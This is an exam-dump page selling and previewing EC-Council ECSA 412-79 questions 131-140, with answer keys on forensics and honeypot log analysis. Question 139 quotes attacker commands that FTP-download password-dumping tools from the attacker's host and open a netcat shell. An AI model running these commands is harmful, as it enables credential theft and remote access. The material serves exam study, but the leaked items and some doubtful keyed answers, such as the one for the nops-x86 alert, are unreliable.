Latest Certified Success Dumps Download

CISCO, MICROSOFT, COMPTIA, HP, IBM, ORACLE, VMWARE
412-79 Latest Exam (Sep 2017)

[Free] 2017(Sep) EnsurePass Testinsides ECCouncil 412-79 Dumps with VCE and PDF 131-140

September 22, 2017

EnsurePass
2017 Sep ECCouncil Official New Released 412-79
100% Free Download! 100% Pass Guaranteed!
http://www.EnsurePass.com/412-79.html

EC-Council Certified Security Analyst (ECSA)

Question No: 131 – (Topic 3)

In what way do the procedures for dealing with evidence in a criminal case differ from the procedures for dealing with evidence in a civil case?

  1. evidence must be handled in the same way regardless of the type of case

  2. evidence procedures are not important unless you work for a law enforcement agency

  3. evidence in a criminal case must be secured more tightly than in a civil case

  4. evidence in a civil case must be secured more tightly than in a criminal case

Answer: C

Question No: 132 – (Topic 3)

You are assigned to work in the computer forensics lab of a state police agency. While working on a high profile criminal case, you have followed every applicable procedure, however your boss is still concerned that the defense attorney might question weather evidence has been changed while at the laB. What can you do to prove that the evidence is the same as it was when it first entered the lab?

  1. make an MD5 hash of the evidence and compare it with the original MD5 hash that was taken when the evidence first entered the lab

  2. make an MD5 hash of the evidence and compare it to the standard database developed by NIST

  3. there is no reason to worry about this possible claim because state labs are certified

  4. sign a statement attesting that the evidence is the same as it was when it entered the lab

Answer: A

Question No: 133 – (Topic 3)

Study the log given below and answer the following question: Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169 Apr 24 14:46:46 [4663]: IDS27/FIN

Scan: 194.222.156.169:56693 -gt; 172.16.1.107:482 Apr 24 18:01:05 [4663]: IDS/DNS-

version-query: 212.244.97.121:3485 -gt; 172.16.1.107:53 Apr 24 19:04:01 [4663]:

IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -gt; 172.16.1.107:21 Apr 25 08:02:41

[5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53 Apr 25 02:08:07 [5875]:

IDS277/DNS-version-query: 63.226.81.13:4499 -gt; 172.16.1.107:53 Apr 25 02:08:07

[5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -gt; 172.16.1.101:53 Apr 25

02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -gt; 172.16.1.107:111 Apr 25

19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -gt; 172.16.1.107:80

Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -gt; 172.16.1.101:53

Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -gt; 172.16.1.107:53 Apr 26

06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0) Apr

26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506) Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -gt;

172.16.1.107:1080 Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 –

gt; 213.28.22.189:4558 Precautionary measures to prevent this attack would include writing firewall rules. Of these firewall rules,

which among the following would be appropriate?

  1. Disallow UDP53 in from outside to DNS server

  2. Allow UDP53 in from DNS server to outside

  3. Disallow TCP53 in from secondaries or ISP server to DNS server

  4. Block all UDP traffic

Answer: A

Question No: 134 – (Topic 3)

When monitoring for both intrusion and security events between multiple computers, it is essential that the computers clocks are synchronize D. Synchronized time allows an administrator to reconstruct what took place during an attack against multiple computers. Without synchronized time, it is very difficult to determine exactly when specific events took place, and how events interlace. What is the name of the service used to synchronize time among multiple computers?

  1. Universal Time Set

  2. Network Time Protocol

  3. SyncTime Service

  4. Time-Sync Protocol

Answer: B

Question No: 135 – (Topic 3)

When investigating a potential e-mail crime, what is your first step in the investigation?

  1. Trace the IP address to its origin

  2. Write a report

  3. Determine whether a crime was actually committed

  4. Recover the evidence

Answer: A

Question No: 136 – (Topic 3)

If a suspect computer is located in an area that may have toxic chemicals, you must:

  1. coordinate with the HAZMAT team

  2. determine a way to obtain the suspect computer

  3. assume the suspect machine is contaminated

  4. do not enter alone

Answer: A

Question No: 137 – (Topic 3)

The following excerpt is taken from a honeypot log. The log captures activities across three days. There are several intrusion attempts; however, a few are successful. (Note: The objective of this question is to test whether the student can read basic information from log entries and interpret the nature of attack.) Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169 Apr 24 14:46:46 [4663]: IDS27/FIN Scan:

194.222.156.169:56693 -gt; 172.16.1.107:482 Apr 24 18:01:05 [4663]: IDS/DNS-version-

query: 212.244.97.121:3485 -gt; 172.16.1.107:53 Apr 24 19:04:01 [4663]: IDS213/ftp-

passwd-retrieval: 194.222.156.169:1425 -gt; 172.16.1.107:21 Apr 25 08:02:41 [5875]:

spp_portscan: PORTSCAN DETECTED from 24.9.255.53 Apr 25 02:08:07 [5875]:

IDS277/DNS-version-query: 63.226.81.13:4499 -gt; 172.16.1.107:53 Apr 25 02:08:07

[5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -gt; 172.16.1.101:53 Apr 25

02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -gt; 172.16.1.107:111 Apr 25

19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -gt; 172.16.1.107:80

Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -gt; 172.16.1.101:53

Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -gt; 172.16.1.107:53 Apr 26

06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0) Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506) Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -gt;

172.16.1.107:1080 Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 –

gt; 213.28.22.189:4558 From the options given below choosethe one which best interprets the following entry: Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -gt;

172.16.1.107:53

  1. An IDS evasion technique

  2. A buffer overflow attempt

  3. A DNS zone transfer

  4. Data being retrieved from 63.226.81.13

Answer: A

Question No: 138 – (Topic 3)

What happens when a file is deleted by a Microsoft operating system using the FAT file system?

  1. only the reference to the file is removed from the FAT

  2. the file is erased and cannot be recovered

  3. a copy of the file is stored and the original file is erased

  4. the file is erased but can be recovered

Answer: A

Question No: 139 – (Topic 3)

The following excerpt is taken from a honeypot log that was hosted at laB. wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD. EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

“cmd1.exe /c open 213.116.251.162 gt;ftpcom” “cmd1.exe /c echo johna2k gt;gt;ftpcom” “cmd1.exe /c echo

haxedj00 gt;gt;ftpcom” “cmd1.exe /c echo get n C.

exe gt;gt;ftpcom”

“cmd1.exe /c echo get pdump.exe gt;gt;ftpcom” “cmd1.exe /c echo get samdump.dll gt;gt;ftpcom” “cmd1.exe /c echo quit gt;gt;ftpcom”

“cmd1.exe /c ftp- s:ftpcom” “cmd1.exe /c nc

-l -p 6969 –

e cmd1.exe”

What can you infer from the exploit given?

  1. It is a local exploit where the attacker logs in using username johna2k

  2. There are two attackers on the system -johna2k and haxedj00

  3. The attack is a remote exploit and the hacker downloads three files

  4. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Answer: C

Question No: 140 – (Topic 3)

When reviewing web logs, you see an entry for resource not found in the HTTP status code fileD. What is the actual error code that you would see in the log for resource not found?

A. 202

B. 404

C. 505

D. 909

Answer: B

100% Free Download!
Download Free Demo:412-79 Demo PDF
100% Pass Guaranteed!
Download 2017 EnsurePass 412-79 Full Exam PDF and VCE

EnsurePass ExamCollection Testking
Lowest Price Guarantee Yes No No
Up-to-Dated Yes No No
Real Questions Yes No No
Explanation Yes No No
PDF VCE Yes No No
Free VCE Simulator Yes No No
Instant Download Yes No No

2017 EnsurePass IT Certification PDF and VCE